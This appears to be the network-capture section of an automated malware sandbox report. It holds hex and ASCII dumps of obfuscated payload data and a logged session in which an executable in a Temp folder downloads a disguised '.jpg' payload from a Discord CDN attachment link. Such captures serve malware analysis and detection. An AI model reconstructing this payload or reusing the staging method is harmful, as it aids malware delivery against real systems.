                                                            2021-10-29 18:10:44 UTC1509INData Raw: 57 59 20 59 59 20 4e 57 20 4e 20 49 20 4c 20 59 43 20 57 49 20 49 4d 20 57 43 20 72 57 20 4e 57 20 63 20 49 20 4c 4d 20 63 63 20 49 72 20 49 4c 20 63 63 20 72 57 20 4e 20 4e 4e 4d 20 63 56 20 72 20 63 72 20 49 57 20 63 63 20 4e 43 4c 20 4c 4c 20 56 57 20 4e 20 49 20 4c 20 59 43 20 4e 4e 49 20 63 72 20 49 57 20 59 4d 20 63 4c 20 56 49 20 4c 20 59 20 4d 43 20 49 59 20 63 59 20 59 72 20 4e 4e 20 56 43 20 56 49 20 4e 20 56 4e 20 4e 4e 56 20 4d 4c 20 4d 43 20 49 4c 20 4c 57 20 4e 4e 72 20 4c 72 20 4c 4e 20 56 59 20 4d 43 20 49 59 20 4e 4e 59 20 57 43 20 59 63 20 72 49 20 4e 56 20 56 59 20 56 4e 20 63 59 20 72 49 20 4e 4e 4c 20 49 57 20 59 49 20 72 20 4e 63 20 4c 4e 20 72 20 4e 43 56 20 57 59 20 4e 4e 56 20 4d 57 20 4c 56 20 56 4c 20 63 20 4e 43 57 20 59 59 20
                                                            Data Ascii: WY YY NW N I L YC WI IM WC rW NW c I LM cc Ir IL cc rW N NNM cV r cr IW cc NCL LL VW N I L YC NNI cr IW YM cL VI L Y MC IY cY Yr NN VC VI N VN NNV ML MC IL LW NNr Lr LN VY MC IY NNY WC Yc rI NV VY VN cY rI NNL IW YI r Nc LN r NCV WY NNV MW LV VL c NCW YY
                                                            2021-10-29 18:10:44 UTC1525INData Raw: 4e 4d 20 72 20 4e 4e 56 20 57 4c 20 72 49 20 57 56 20 59 72 20 49 72 20 4e 4e 4d 20 56 4d 20 4e 43 57 20 4c 20 59 43 20 4e 20 59 43 20 59 72 20 49 4d 20 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 56 4d 20 4e 43 4c 20 72 49 20 4e 56 72 20 59 72 20 4c 4e 20 4e 4e 72 20 59 57 20 4e 43 57 20 4c 57 20 59 43 20 4e 56 4d 20 59 43 20 4e 56 43 20 49 72 20 4e 4e 72 20 4c 63 20 72 4e 20 4e 4e 56 20 4e 43 56 20 72 49 20 63 59 20 59 72 20 57 4d 20 4e 4e 72 20 59 4e 20 4e 43 57 20 59 4e 20 59 43 20 4e 56 59 20 59 43 20 63 63 20 49 72 20 72 49 20 4e 4e 4d 20 57 56 20 4e 4e 56 20 63 20 72 49 20 63 20 59 72 20 56 4c 20 4e 4e 72 20 4e 56 20 4e 43 57 20 4e 57 20 59 43 20 4e 56 4d 20 59 43 20 4e 4e 72 20 49 72 20 56 4e 20 4e 4e 4d 20 59 63 20 4e 4e 56 20 4d 72 20 72 49 20 4e 4e 4d
                                                            Data Ascii: NM r NNV WL rI WV Yr Ir NNM VM NCW L YC N YC Yr IM Nr NNM NCW NVM NCL rI NVr Yr LN NNr YW NCW LW YC NVM YC NVC Ir NNr Lc rN NNV NCV rI cY Yr WM NNr YN NCW YN YC NVY YC cc Ir rI NNM WV NNV c rI c Yr VL NNr NV NCW NW YC NVM YC NNr Ir VN NNM Yc NNV Mr rI NNM
                                                            2021-10-29 18:10:44 UTC1541INData Raw: 63 20 72 72 20 59 49 20 56 56 20 49 63 20 57 4d 20 4e 4e 57 20 4e 56 63 20 4e 4e 56 20 4c 4c 20 72 57 20 59 63 20 4c 59 20 4d 43 20 56 72 56 20 56 4c 56 20 4e 4e 43 20 57 49 20 4e 4d 49 20 4e 72 59 20 72 63 20 59 63 20 49 4e 20 4e 4e 72 20 4e 4e 4d 20 4e 56 4d 20 56 72 56 20 4e 59 20 72 4e 20 59 4c 20 59 4e 20 63 59 20 57 63 20 49 49 20 4e 43 49 20 57 49 20 4e 4d 49 20 56 43 43 20 4c 57 20 4c 57 20 4e 43 57 20 4e 4e 59 20 4e 43 4c 20 56 4c 4d 20 4e 4c 63 20 4c 56 20 4e 4d 63 20 56 43 56 20 4c 63 20 56 4e 56 20 4e 4c 49 20 4e 43 4c 20 56 4c 4d 20 4e 4c 63 20 59 4c 20 4c 4d 20 4c 59 20 4e 59 20 49 59 20 57 63 20 56 72 59 20 4e 72 57 20 57 63 20 4c 72 20 72 57 20 59 4e 20 4c 59 20 4d 43 20 57 59 20 4e 4e 63 20 4e 4e 59 20 4e 4e 56 20 4c 57 20 4c 72 20 4e 4d
                                                            Data Ascii: c rr YI VV Ic WM NNW NVc NNV LL rW Yc LY MC VrV VLV NNC WI NMI NrY rc Yc IN NNr NNM NVM VrV NY rN YL YN cY Wc II NCI WI NMI VCC LW LW NCW NNY NCL VLM NLc LV NMc VCV Lc VNV NLI NCL VLM NLc YL LM LY NY IY Wc VrY NrW Wc Lr rW YN LY MC WY NNc NNY NNV LW Lr NM
                                                            2021-10-29 18:10:44 UTC1557INData Raw: 57 20 4e 43 57 20 4c 56 20 49 20 59 4c 20 4c 43 20 49 72 20 4e 43 4c 20 4e 43 4c 20 63 72 20 4e 4e 4c 20 63 43 20 59 4e 20 56 63 20 59 72 20 57 56 20 4e 4e 57 20 57 4c 20 4e 43 57 20 57 4d 20 4e 4d 57 20 59 63 20 59 59 20 63 56 20 49 72 20 57 63 20 56 72 59 20 4e 4c 63 20 4e 4e 59 20 56 63 20 72 49 20 63 43 20 59 4c 20 4e 56 72 20 4e 4e 72 20 4e 4e 57 20 4e 43 4c 20 49 49 20 59 43 20 4c 4d 20 4c 56 20 4e 49 56 20 56 72 4e 20 4e 4e 59 20 4e 43 4c 20 56 4c 4d 20 56 4e 63 20 59 57 20 56 72 20 59 43 20 4c 59 20 4d 43 20 63 4d 20 4e 4e 63 20 4e 56 4d 20 56 72 43 20 56 4c 43 20 59 4d 20 56 63 20 59 72 20 63 59 20 57 63 20 63 49 20 4e 43 49 20 57 49 20 4e 4d 49 20 56 72 72 20 59 57 20 4c 43 20 49 72 20 4e 43 4c 20 4e 43 4c 20 57 56 20 4e 4e 4c 20 4c 56 20 4e 4d
                                                            Data Ascii: W NCW LV I YL LC Ir NCL NCL cr NNL cC YN Vc Yr WV NNW WL NCW WM NMW Yc YY cV Ir Wc VrY NLc NNY Vc rI cC YL NVr NNr NNW NCL II YC LM LV NIV VrN NNY NCL VLM VNc YW Vr YC LY MC cM NNc NVM VrC VLC YM Vc Yr cY Wc cI NCI WI NMI Vrr YW LC Ir NCL NCL WV NNL LV NM
                                                            2021-10-29 18:10:44 UTC1573INData Raw: 4d 20 4e 4e 72 20 4e 20 4e 43 57 20 56 4d 20 59 43 20 49 56 20 59 43 20 57 4e 20 49 72 20 59 56 20 4e 4e 4d 20 59 20 4e 4e 56 20 4e 43 72 20 72 49 20 4e 56 56 20 59 72 20 72 72 20 4e 4e 72 20 72 57 20 4e 43 57 20 4e 49 20 59 43 20 56 20 59 43 20 57 43 20 49 72 20 4d 20 4e 4e 4d 20 59 56 20 4e 4e 56 20 57 59 20 72 49 20 4e 4e 63 20 59 72 20 72 63 20 4e 4e 72 20 72 4d 20 4e 43 57 20 4c 4c 20 59 43 20 63 72 20 59 43 20 57 4e 20 49 72 20 4e 57 20 4e 4e 4d 20 72 56 20 4e 4e 56 20 4e 56 43 20 72 49 20 63 49 20 59 72 20 59 4c 20 4e 4e 72 20 59 43 20 4e 43 57 20 56 49 20 59 43 20 63 49 20 59 43 20 4e 4e 4e 20 49 72 20 4c 4d 20 4e 4e 4d 20 59 57 20 4e 4e 56 20 63 59 20 72 49 20 4e 43 4d 20 59 72 20 59 4d 20 4e 4e 72 20 4d 63 20 4e 43 57 20 4c 4e 20 59 43 20 49 4c
                                                            Data Ascii: M NNr N NCW VM YC IV YC WN Ir YV NNM Y NNV NCr rI NVV Yr rr NNr rW NCW NI YC V YC WC Ir M NNM YV NNV WY rI NNc Yr rc NNr rM NCW LL YC cr YC WN Ir NW NNM rV NNV NVC rI cI Yr YL NNr YC NCW VI YC cI YC NNN Ir LM NNM YW NNV cY rI NCM Yr YM NNr Mc NCW LN YC IL
                                                            2021-10-29 18:10:44 UTC1589INData Raw: 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59
                                                            Data Ascii: YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI Y
                                                            2021-10-29 18:10:44 UTC1605INData Raw: 43 20 4e 43 20 4e 56 49 20 72 43 20 72 72 20 43 20 43 20 4e 43 20 4e 56 56 20 49 20 72 72 20 63 20 72 43 20 4c 4d 20 43 20 43 20 4e 43 20 43 20 63 20 72 56 20 63 59 20 56 49 20 43 20 43 20 4e 20 43 20 43 20 43 20 4e 20 43 20 43 20 43 20 4e 49 59 20 4e 20 43 20 43 20 56 43 63 20 4e 20 43 20 43 20 4e 56 20 43 20 43 20 43 20 4e 49 63 20 4e 20 43 20 43 20 4e 57 20 72 49 20 72 20 43 20 57 72 20 43 20 43 20 43 20 59 20 43 20 43 20 4e 4d 20 56 72 20 4e 72 4e 20 49 49 20 43 20 43 20 4e 20 4c 4d 20 4c 56 20 4e 20 43 20 43 20 43 20 4c 4e 20 59 4d 20 4e 59 4d 20 4c 4d 20 4c 56 20 4e 20 43 20 43 20 43 20 4c 4e 20 59 4d 20 4e 59 4d 20 4c 4d 20 4c 56 20 4e 20 43 20 43 20 43 20 4c 4e 20 72 49 20 4e 59 4d 20 4c 4d 20 4c 56 20 4e 20 43 20 43 20 43 20 4c 4e 20 57 57 20 4e
                                                            Data Ascii: C NC NVI rC rr C C NC NVV I rr c rC LM C C NC C c rV cY VI C C N C C C N C C C NIY N C C VCc N C C NV C C C NIc N C C NW rI r C Wr C C C Y C C NM Vr NrN II C C N LM LV N C C C LN YM NYM LM LV N C C C LN YM NYM LM LV N C C C LN rI NYM LM LV N C C C LN WW N
                                                            2021-10-29 18:10:44 UTC1621INData Raw: 20 4e 20 4e 57 4c 20 56 20 4c 57 20 4e 63 20 56 59 4c 20 59 20 56 4e 4d 20 56 20 56 59 20 4e 57 20 56 20 63 20 56 43 4e 20 56 20 57 4e 20 4e 57 20 4e 59 20 63 20 56 43 4e 20 56 20 56 43 4c 20 56 20 4e 49 20 63 20 72 4e 20 43 20 59 4e 20 43 20 4e 72 63 20 4e 20 63 72 20 43 20 56 4d 20 43 20 4e 72 4e 20 4e 20 63 72 20 43 20 4e 57 20 43 20 4e 4c 56 20 4e 20 63 4d 20 43 20 4e 4e 20 43 20 4e 43 4e 20 4e 20 63 4d 20 43 20 4e 57 20 43 20 4e 4c 56 20 4e 20 4d 4c 20 43 20 59 4e 20 43 20 4e 63 4c 20 4e 20 57 57 20 43 20 4e 4e 20 43 20 4e 43 4e 20 4e 20 57 57 20 43 20 4e 57 20 43 20 4e 4c 56 20 4e 20 4e 43 59 20 43 20 59 4e 20 43 20 4e 49 4c 20 4e 20 4e 56 49 20 43 20 56 4d 20 43 20 4e 72 4e 20 4e 20 4e 4c 4e 20 43 20 4c 59 20 43 20 4e 72 4e 20 4e 20 4e 4c 4e 20 43
                                                            Data Ascii: N NWL V LW Nc VYL Y VNM V VY NW V c VCN V WN NW NY c VCN V VCL V NI c rN C YN C Nrc N cr C VM C NrN N cr C NW C NLV N cM C NN C NCN N cM C NW C NLV N ML C YN C NcL N WW C NN C NCN N WW C NW C NLV N NCY C YN C NIL N NVI C VM C NrN N NLN C LY C NrN N NLN C
                                                            2021-10-29 18:10:44 UTC1637INData Raw: 4e 20 4e 4e 63 20 4d 4d 20 4e 43 4e 20 4e 43 57 20 57 49 20 4e 43 4e 20 4e 4e 72 20 4e 4e 59 20 43 20 4e 4e 72 20 4e 43 59 20 4e 43 43 20 4e 43 43 20 4e 43 4e 20 4e 4e 72 20 4e 4e 59 20 43 20 49 56 20 4e 4e 4d 20 4e 4e 43 20 4e 4e 63 20 4e 43 59 20 4e 43 57 20 4e 43 4e 20 4d 56 20 4e 43 4e 20 4e 43 49 20 4e 4e 56 20 4e 43 4e 20 4e 4e 72 20 4e 4e 59 20 43 20 4e 43 4c 20 4e 43 59 20 4e 4e 56 20 4e 4e 56 20 4e 43 4e 20 4e 4e 72 20 4e 4e 59 20 43 20 57 57 20 4e 4e 4d 20 4e 43 57 20 57 49 20 4e 43 4e 20 4e 4e 72 20 4e 43 4e 20 4e 4e 72 20 4e 4e 59 20 43 20 4e 4e 59 20 4e 43 59 20 4e 43 49 20 4e 4e 49 20 4e 43 4e 20 4e 4e 72 20 4e 43 4e 20 4e 4e 72 20 4e 4e 59 20 43 20 4e 4e 4e 20 4e 56 43 20 4e 43 59 20 4e 43 43 20 4e 43 59 20 4e 4e 59 20 4e 43 4e 20 4e 4e 72
                                                            Data Ascii: N NNc MM NCN NCW WI NCN NNr NNY C NNr NCY NCC NCC NCN NNr NNY C IV NNM NNC NNc NCY NCW NCN MV NCN NCI NNV NCN NNr NNY C NCL NCY NNV NNV NCN NNr NNY C WW NNM NCW WI NCN NNr NCN NNr NNY C NNY NCY NCI NNI NCN NNr NCN NNr NNY C NNN NVC NCY NCC NCY NNY NCN NNr


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3192.168.2.549826162.159.133.233443C:\Users\user\AppData\Local\Temp\77DC.exe
                                                            TimestampkBytes transferredDirectionData
                                                            2021-10-29 18:10:59 UTC1652OUTGET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1
                                                            Host: cdn.discordapp.com
                                                            Connection: Keep-Alive
                                                            2021-10-29 18:10:59 UTC1652INHTTP/1.1 200 OK
                                                            Date: Fri, 29 Oct 2021 18:10:59 GMT
                                                            Content-Type: image/jpeg
                                                            Content-Length: 1023400
                                                            Connection: close
                                                            CF-Ray: 6a5e5d1f09755363-FRA
                                                            Accept-Ranges: bytes
                                                            Age: 279355
                                                            Cache-Control: public, max-age=31536000
                                                            ETag: "a79ffe2a90ab83e54cd38dd94a2b6a6d"
                                                            Expires: Sat, 29 Oct 2022 18:10:59 GMT
                                                            Last-Modified: Tue, 26 Oct 2021 11:56:33 GMT
                                                            Vary: Accept-Encoding
                                                            CF-Cache-Status: HIT
                                                            Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            Cf-Bgj: h2pri
                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                            x-goog-generation: 1635249393939568
                                                            x-goog-hash: crc32c=mLSBFQ==
                                                            x-goog-hash: md5=p5/+KpCrg+VM043ZSitqbQ==
                                                            x-goog-metageneration: 1
                                                            x-goog-storage-class: STANDARD
                                                            x-goog-stored-content-encoding: identity
                                                            x-goog-stored-content-length: 1023400
                                                            X-GUploader-UploadID: ADPycduXLAU0rhkOYYdjTYv8nzQOrUiGMR0rq3qWR-Mu3t2dKo7sgrujSRwPDi2ARPYGwmCnqDDiBBlucDqiDRky3RaT0EIS3w
                                                            X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FBCCli9hLmvTVpjK%2F17yZ96yTAbmOtxa2Il8Hhqs2EvSv7qiav6JXBDgQeLEEj%2BgI8x80pBrYH%2BcBWtM01FY3SkDjqMWtr7IYtN9U5zQG4DDiSQlZmmZnTUWu4sg60TyYQRuzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            2021-10-29 18:10:59 UTC1653INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                            Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                            2021-10-29 18:10:59 UTC1653INData Raw: 78 4f 6f 45 4b 59 52 74 6b 51 2d 74 74 20 51 78 20 4f 4b 4b 20 78 20 45 20 78 20 78 20 78 20 4b 20 78 20 78 20 78 20 6f 59 59 20 6f 59 59 20 78 20 78 20 4f 6b 4b 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 52 4b 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 4f 6f 6b 20 78 20 78 20 78 20 4f 4b 20 45 4f 20 4f 6b 52 20 4f 4b 20 78 20 4f 6b 78 20 51 20 6f 78 59 20 45 45 20 4f 6b 4b 20 4f 20 74 52 20 6f 78 59 20 45 45 20 6b 4b 20 4f 78 4b 20 4f 78 59 20 4f 4f 59 20 45 6f 20 4f 4f 6f 20 4f 4f 4b 20 4f 4f 4f 20 4f 78 45 20 4f 4f 4b 20 51 74 20 4f 78 51 20 45 6f 20 51 51 20 51 74 20 4f 4f 78 20 4f
                                                            Data Ascii: xOoEKYRtkQ-tt Qx OKK x E x x x K x x x oYY oYY x x OkK x x x x x x x RK x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x Ook x x x OK EO OkR OK x Okx Q oxY EE OkK O tR oxY EE kK OxK OxY OOY Eo OOo OOK OOO OxE OOK Qt OxQ Eo QQ Qt OOx O
                                                            2021-10-29 18:10:59 UTC1654INData Raw: 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 6f 59 20 4b 78 20 6f 6f 51 20 4f 78 51 20 4f 4f 59 20 59 78 20 4b 6b 20 59 78 20 59 78 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 4b 52 20 4f 4b 45 20 59 78 20 4b 6b 20 4f 45 6b 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 4f 6f 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20
                                                            Data Ascii: x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x oY Kx ooQ OxQ OOY Yx Kk Yx Yx kK OOK OOt OKR OKE Yx Kk OEk YK kK OOK OOt OxQ OOo Yx OOo Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx
                                                            2021-10-29 18:10:59 UTC1656INData Raw: 78 20 4f 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 45 6f 20 4f 6b 45 20 59 59 20 6b 4b 20 4f 4f 4b 20 6b 59 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 6b 4b 20 59 4f 20 59 4b 20 6b 4b 20 4f 4f 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 4f 6b 20 59 4b 20 6b 4b 20 4f 6b 20 51 4f 20 45 4f 20 45 20 52 4b 20 6b 45 20 59 78 20 59 4b 20 6b 4b 20 4f 74 6b 20 4f 4f 6b 20 4f 78 51 20 4f 4f 6f 20 59 78 20 6f 4b 78 20 59 4f 20 59 4b 20 6b 4b 20 4f 4f 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4f 51 78 20 4b 51 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 59 45 20 4f 78 51 20 4f
                                                            Data Ascii: x O OxQ OOo Yx OEo OkE YY kK OOK kY OxQ OOo Yx OkK YO YK kK OOk OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Ok YK kK Ok QO EO E RK kE Yx YK kK Otk OOk OxQ OOo Yx oKx YO YK kK OOk OOt OxQ OOo OQx KQ Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK YE OxQ O
                                                            2021-10-29 18:10:59 UTC1657INData Raw: 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59
                                                            Data Ascii: Q OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Y
                                                            2021-10-29 18:10:59 UTC1658INData Raw: 51 20 4f 4f 6f 20 59 52 20 45 51 20 45 74 20 4b 74 20 6f 4f 74 20 4b 6f 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 6f 45 20 45 6b 20 52 4b 20 59 59 20 6b 4b 20 4f 4f 4b 20 59 20 45 4f 20 4b 4f 20 59 78 20 4b 6b 20 52 52 20 74 6f 20 74 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 6b 6b 20 4b 59 20 4b 6b 20 59 78 20 52 78 20 6f 4b 52 20 6b 74 20 51 6b 20 45 4f 20 4f 20 59 78 20 4b 6b 20 52 52 20 52 6b 20 6f 59 4f 20 4f 4f 4b 20 4f 4f 74 20 6f 51 20 4f 4b 20 4b 4b 20 4b 6b 20 59 78 20 52 78 20 4f 6f 4b 20 4f 78 51 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 4f 4b 4b 20 6f 4f 20 4b 6f 20 52 6b 20 4f 4b 74 20 4f 4f 4b 20 4f 4f 74 20 6f 51 20 6f 20 59 45 20 4b 51 20 59 78 20 74 78 20 4b 6f 20 4f 78 6b 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 6f 52 20 4b 74 20 59 78 20 59 4b
                                                            Data Ascii: Q OOo YR EQ Et Kt oOt Ko OOt OxQ OOE oE Ek RK YY kK OOK Y EO KO Yx Kk RR to tK OOK OOt OxE kk KY Kk Yx Rx oKR kt Qk EO O Yx Kk RR Rk oYO OOK OOt oQ OK KK Kk Yx Rx OoK OxQ OOt OxQ Ooo OKK oO Ko Rk OKt OOK OOt oQ o YE KQ Yx tx Ko Oxk OOt OxQ Ooo oR Kt Yx YK
                                                            2021-10-29 18:10:59 UTC1660INData Raw: 20 6f 78 45 20 6b 4b 20 4f 4f 4b 20 4f 4f 45 20 52 51 20 4f 4f 4b 20 59 78 20 4b 6b 20 6f 59 20 6b 51 20 4f 4f 6f 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 51 74 20 59 59 20 45 45 20 59 4b 20 6f 78 78 20 6b 6f 20 4f 52 4b 20 4f 4f 52 20 4f 78 51 20 4f 4f 6b 20 52 59 20 45 78 20 59 78 20 59 4b 20 51 4b 20 4f 6f 20 4f 45 51 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 4f 20 45 4f 20 45 45 20 4f 4f 4b 20 4f 6f 20 4f 4b 6f 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 78 52 20 59 6f 20 6f 45 59 20 6b 59 20 4f 4f 4b 20 4f 4f 59 20 45 78 20 51 59 20 59 78 20 4b 6b 20 59 52 20 4f 51 20 6f 4f 6f 20 4f 4b 78 20 4f 4f 74 20 4f 78 51 20 4f 4f 52 20 6f 52 20 59 4f 20 59 78 20 59 4b 20 4f 6f 74 20 6f 51 20 51 59 20 4f 78 6b 20 4f 4f 6f 20 59 6f 20 45 45 20 59 59 20 45 51 20 6b 78 20
                                                            Data Ascii: oxE kK OOK OOE RQ OOK Yx Kk oY kQ OOo OOY OOt Oxt Qt YY EE YK oxx ko ORK OOR OxQ OOk RY Ex Yx YK QK Oo OEQ OxQ OOo YK oO EO EE OOK Oo OKo OxQ OOo YK oxR Yo oEY kY OOK OOY Ex QY Yx Kk YR OQ oOo OKx OOt OxQ OOR oR YO Yx YK Oot oQ QY Oxk OOo Yo EE YY EQ kx
                                                            2021-10-29 18:10:59 UTC1661INData Raw: 78 51 20 4f 6f 6f 20 52 59 20 6b 20 59 78 20 59 4b 20 51 4b 20 51 78 20 74 52 20 4f 78 51 20 4f 4f 6f 20 59 52 20 59 51 20 59 45 20 45 78 20 4f 4f 78 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 51 45 20 59 45 20 59 4b 20 52 45 20 6f 45 59 20 4f 6f 74 20 4f 4f 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 4b 20 6f 52 20 59 52 20 59 78 20 59 4b 20 6b 6f 20 4f 6f 52 20 4f 4f 4b 20 45 78 20 6f 4f 51 20 59 78 20 4b 6b 20 59 6f 20 45 74 20 6b 78 20 51 51 20 4f 4f 45 20 4f 4f 45 20 6f 59 45 20 4f 78 4b 20 4b 6b 20 59 78 20 59 59 20 4f 4f 45 20 4f 52 6f 20 6f 6f 6f 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 4b 20 59 20 59 4b 20 6b 4b 20 4f 6f 78 20 52 20 6b 59 20 4f 4f 6f 20 59 78 20 59 6b 20 51 45 20 4f 45 59 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 74 59 20 4f 78 6f 20 45 45 20 59 45
                                                            Data Ascii: xQ Ooo RY k Yx YK QK Qx tR OxQ OOo YR YQ YE Ex OOx OOK OOt OxE QE YE YK RE oEY Oot OOY OOt OxQ OOK oR YR Yx YK ko OoR OOK Ex oOQ Yx Kk Yo Et kx QQ OOE OOE oYE OxK Kk Yx YY OOE ORo ooo OxQ OOo YK oK Y YK kK Oox R kY OOo Yx Yk QE OEY kK OOK OOY tY Oxo EE YE
